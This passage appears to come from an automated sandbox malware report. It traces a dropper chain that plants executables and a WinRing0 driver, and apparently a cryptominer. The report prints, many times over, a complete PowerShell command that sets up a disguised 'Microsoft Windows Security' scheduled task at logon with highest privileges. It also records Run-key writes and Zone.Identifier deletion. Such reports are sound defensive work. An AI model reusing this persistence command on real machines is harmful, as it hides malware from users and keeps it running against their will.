                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\sysnldcvmr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                  Source: Binary string: ntkrnlmp.pdbx, source: 191563587.exe, 00000010.00000002.4518239198.0000000009DBB000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000002.4457470873.0000000009026000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 191563587.exe, 00000010.00000002.4518239198.0000000009DBB000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000002.4457470873.0000000009026000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }Jump to behavior
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: jacrzswcvuml.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                  Source: 2736615137.exe.1.drStatic PE information: real checksum: 0x6517 should be: 0x659f
                  Source: sysnldcvmr.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22cb3
                  Source: newtpp.exeStatic PE information: real checksum: 0x0 should be: 0x22cb3
                  Source: 1224321169.exe.1.drStatic PE information: real checksum: 0x0 should be: 0xa6a9
                  Source: nxmr[1].exe.11.drStatic PE information: section name: .xdata
                  Source: 1088610392.exe.11.drStatic PE information: section name: .xdata
                  Source: winupsecvmgr.exe.15.drStatic PE information: section name: .xdata
                  Source: jacrzswcvuml.tmp.21.drStatic PE information: section name: _RANDOMX
                  Source: jacrzswcvuml.tmp.21.drStatic PE information: section name: _TEXT_CN
                  Source: jacrzswcvuml.tmp.21.drStatic PE information: section name: _TEXT_CN
                  Source: jacrzswcvuml.tmp.21.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeCode function: 11_2_00D91AD1 push ecx; ret 11_2_00D91AE4
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeCode function: 14_2_00571761 push ecx; ret 14_2_00571774
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeCode function: 16_2_00AF2661 push ecx; ret 16_2_00AF2674
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B9BD2A5 pushad ; iretd 17_2_00007FFD9B9BD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD7B9A push eax; ret 17_2_00007FFD9BAD7BA9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD7BD3 push eax; ret 17_2_00007FFD9BAD7BA9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD36DC push esi; retf 17_2_00007FFD9BAD373A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD35FA push esi; retf 17_2_00007FFD9BAD362A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD754D push ebx; iretd 17_2_00007FFD9BAD756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BBA2AD0 pushad ; iretd 17_2_00007FFD9BBA2AD1
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C725AC push rsi; ret 24_2_00007FF693C725C6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9B98D2A5 pushad ; iretd 25_2_00007FFD9B98D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9BAA7D70 push ebx; retf 25_2_00007FFD9BAA7DFA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9BAA756B push ebx; iretd 25_2_00007FFD9BAA756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9BAA752B push ebx; iretd 25_2_00007FFD9BAA756A

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Users\user\Desktop\newtpp.exeExecutable created and started: C:\Windows\sysnldcvmr.exeJump to behavior
                  Sample is not signed and drops a device driver
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeFile created: C:\Users\user\AppData\Local\Temp\1088610392.exeJump to dropped file
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\204078699.exeJump to dropped file
                  Source: C:\Users\user\Desktop\newtpp.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\191563587.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeFile created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJump to dropped file
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exeJump to dropped file
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\1224321169.exeJump to dropped file
                  Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\2736615137.exeJump to dropped file
                  Source: C:\Users\user\Desktop\newtpp.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses Register-ScheduledTask to add task schedules
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                  Source: C:\Users\user\Desktop\newtpp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Found hidden mapped module (file has been removed from disk)
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Users\user\Desktop\newtpp.exeFile opened: C:\Users\user\Desktop\newtpp.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Windows\sysnldcvmr.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\1224321169.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\2736615137.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\204078699.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\191563587.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeFile opened: C:\Users\user\AppData\Local\Temp\1088610392.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
